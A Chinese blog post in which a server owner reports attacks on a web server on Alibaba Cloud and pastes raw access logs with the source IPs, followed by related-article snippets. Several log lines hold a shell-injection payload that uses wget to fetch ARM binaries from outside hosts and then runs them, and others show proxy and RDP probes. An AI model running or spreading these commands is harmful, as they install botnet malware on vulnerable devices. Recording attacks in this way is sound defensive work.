1、背景

在阿里云公网上部署web服务器，最近客户反映我的服务经常断掉，查看后台日志，发现境外的IP攻击。
比如：

209.141.56.212 - - [17/Sep/2021 04:52:04] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv3;wget+http:/\/154.16.118.104/arm;chmod+777+arm;./arm+0day.jawsv3 HTTP/1.1[0m" 404 -

如下图：

2、ip地址查询

我使用的是马老师家的IP地址库查询：
https://ip.taobao.com/?spm=a2c4g.11186623.0.0.2f953788CNPh0g

比如下面查询日志中可以的IP:
209.141.56.212

3、可疑请求ip

209.141.56.212

209.141.56.212 - - [17/Sep/2021 05:29:09] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/154.16.118.104/arm7;chmod+777+arm7;./arm7+0day.jawsv3;wget+http:/\/154.16.118.104/arm;chmod+777+arm;./arm+0day.jawsv3 HTTP/1.1[0m" 404 -

141.101.196.233
这个攻击者有点意思（友善？），查到我的服务器在中国就没接着攻击了，详细如下：

[ INFO ] 141.101.196.233 - - [17/Sep/2021 12:58:17] "CONNECT 91.214.48.87:80 HTTP/1.1" 404 -
[ ERROR ] 141.101.196.233 - - [17/Sep/2021 12:58:27] code 400, message Bad request syntax ('\x04\x01\x00P[Ö0W0\x00')
[ INFO ] 141.101.196.233 - - [17/Sep/2021 12:58:27] "P[Ö0W0" HTTPStatus.BAD_REQUEST -
[ INFO ] 141.101.196.233 - - [17/Sep/2021 12:58:29] "POST http://proxy.kagda.ru/myip2.php?Z74857023071Q1 HTTP/1.1" 404 -

47.100.27.27

89.248.165.93 - - [13/Sep/2021 16:29:22] code 400, message Bad request syntax ('\x03\x00\x00\x13\x0eà\x00\x00\x00\x00\x00\x01\x00\x08\x00\x02\x00\x00\x00')
89.248.165.93 - - [13/Sep/2021 16:29:22] "[35m[1m  à          [0m" HTTPStatus.BAD_REQUEST -

205.185.115.123

205.185.115.123 - - [13/Sep/2021 19:30:50] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/107.189.7.16/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\/107.189.7.16/arm;chmod+777+arm;./arm+jaws HTTP/1.1[0m" 404 -

89.248.165.13

89.248.165.13 - - [13/Sep/2021 23:46:45] code 400, message Bad request syntax ('\x03\x00\x00\x13\x0eà\x00\x00\x00\x00\x00\x01\x00\x08\x00\x02\x00\x00\x00')
89.248.165.13 - - [13/Sep/2021 23:46:45] "[35m[1m  à          [0m" HTTPStatus.BAD_REQUEST -

205.185.115.123

205.185.115.123 - - [14/Sep/2021 04:52:39] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/107.189.7.16/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\/107.189.7.16/arm;chmod+777+arm;./arm+jaws HTTP/1.1[0m" 404 -
205.185.115.123 - - [14/Sep/2021 10:27:01] "[33mGET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/107.189.7.16/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\/107.189.7.16/arm;chmod+777+arm;./arm+jaws HTTP/1.1[0m" 404 -

74.120.14.44

74.120.14.44 - - [14/Sep/2021 10:39:06] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x00{\x01\x00\x00w\x03\x030âFh®\xad\x18\xad\x8c=\x8d\x07Ï4úiQß\x90æ\x92\x80±àTêP*6ß\x10\x08\x00\x00\x1aÀ/À+À\x11À\x07À\x13À')
74.120.14.44 - - [14/Sep/2021 10:39:06] "[35m[1m {  w0âFh®Œ=Ï4úiQßæ’€±àTêP*6ß  À/À+ÀÀÀÀ  ÀÀ[0m" HTTPStatus.BAD_REQUEST -
74.120.14.44 - - [14/Sep/2021 10:39:08] "GET / HTTP/1.1" 200 -
74.120.14.44 - - [14/Sep/2021 10:39:08] "GET / HTTP/1.1" 200 -

185.219.52.154

185.219.52.154 - - [14/Sep/2021 22:34:50] code 400, message Bad request version ('\x03\x00(\x00\x04ÿ\x08\x00\x01U\x00\x00\x00MSSQLServer\x00É·\x00\x00')
185.219.52.154 - - [14/Sep/2021 22:34:50] "[35m[1m 4           ( ÿ U   MSSQLServer É·  [0m" HTTPStatus.BAD_REQUEST -

78.128.112.18

78.128.112.18 - - [15/Sep/2021 00:58:36] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
78.128.112.18 - - [15/Sep/2021 00:58:36] "[35m[1m  /*à     Cookie: mstshash=Administr[0m" HTTPStatus.BAD_REQUEST -

47.103.21.238

47.103.21.238 - - [15/Sep/2021 08:48:35] code 400, message Bad request version ("_¸<³'àA\x04\x9b\x84%.W7\x00\x00\x16À\x14\x005À\x13\x00/À,À+À0\x00\x9dÀ/\x00\x9c\x00")
47.103.21.238 - - [15/Sep/2021 08:48:35] "[35m[1m ˆ  „aABã²‚ øN5[‡ç47þ_¸<³'àA›„%.W7  À 5À /À,À+À0 À/ œ [0m" HTTPStatus.BAD_REQUEST -

161.189.134.11

161.189.134.11 - - [15/Sep/2021 14:27:33] code 400, message Bad request syntax ('{\x01\x00\x1615888888888À¨\x90Á\x13\x8a{')
161.189.134.11 - - [15/Sep/2021 14:27:33] "[35m[1m{ 15888888888À¨ÁŠ{[0m" HTTPStatus.BAD_REQUEST -

【网络安全】关于http服务器遭受webshell攻击相关推荐

服务器被ddos攻击了怎么处理
服务器被DDOS攻击是很常见的事情,但对于网站管理员来说,这可能是一件非常麻烦的事情.那么,当服务器被DDOS攻击时,我们应该怎么处理呢? 第一步,尽快确定服务器是否真的被DDOS攻击了.可以使用网站 ...
win2003遭受udp攻击导致带宽占用很大
2019独角兽企业重金招聘Python工程师标准>>> 朋友国外的机器带宽突然跑的很大,网站不多,后来说是把对外的udp端口给封了就好了.后来在国内一个放企业站上面也出现过如此的情况 ...
新网互联确认19日DNS服务器遭恶意攻击,导致数以万计的域名无法访问
新浪科技讯 6月22日凌晨消息,域名服务商新网互联20日对外发布公告称,该公司的DNS解析服务器于6月19日晚8点左右遭受恶意攻击,导致大部分域名无法顺利完成解析. 新网互联表示,目前大部分地区域名解 ...
服务器遭受攻击的方式，如何抵御攻击？
分布式拒绝服务(DDoS:Distributed Denial of Service)攻击指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒 ...
【服务器防护】WEB防护 - WEBSHELL攻击探测【转载】
1.概述笔者一直在关注webshell的安全分析,最近就这段时间的心得体会和大家做个分享. webshell一般有三种检测方式: 基于流量模式基于agent模式(实质是直接分析webshell文件) ...
服务器遭受攻击后，这样排查处理不背锅！
安全总是相对的,再安全的服务器也有可能遭受到攻击.作为一个安全运维人员,要把握的原则是:尽量做好系统安全防护,修复所有已知的危险行为,同时,在系统遭受攻击后能够迅速有效地处理攻击行为,最大限度地降低攻 ...
本人服务器遭受黑客长期攻击，特把这几天做的一些有用的安全方面总结出来，以方便以后查阅
消息队列 iis 360 north rar sql2000 netscren 本人服务器遭受黑客长期攻击,特把这几天做的一些有用的安全方面总结出来,以方便以后查阅,希望这次彻底解觉黑客的攻击,特次谢 ...
欧盟委员会遭受DDoS攻击服务器离线数小时
据外媒报道,当地时间周四欧盟委员会( European Commission)官网遭受分布式拒绝服务(DDoS)攻击,致使服务器离线数小时.欧盟委员会在一份声明中确认其成为了DDoS攻击目标,不过表示 ...
乌克兰政府和银行再次遭受DDoS攻击、1亿部三星手机的加密功能存在缺陷｜2月24日全球网络安全热点
安全资讯报告 25个恶意JavaScript库通过官方NPM包存储库分发一批25个恶意JavaScript库进入了官方NPM软件包注册表,目的是从受感染的系统中窃取Discord令牌和环境变量. D ...

【网络安全】关于http服务器遭受webshell攻击

【网络安全】关于http服务器遭受webshell攻击

1、背景

2、ip地址查询

3、可疑请求ip

【网络安全】关于http服务器遭受webshell攻击相关推荐

最新文章

热门文章

【网络安全】 关于http服务器遭受webshell攻击

【网络安全】 关于http服务器遭受webshell攻击

1、背景

2、ip地址查询

3、可疑请求ip

【网络安全】 关于http服务器遭受webshell攻击相关推荐

最新文章

热门文章

【网络安全】关于http服务器遭受webshell攻击

【网络安全】关于http服务器遭受webshell攻击

【网络安全】关于http服务器遭受webshell攻击相关推荐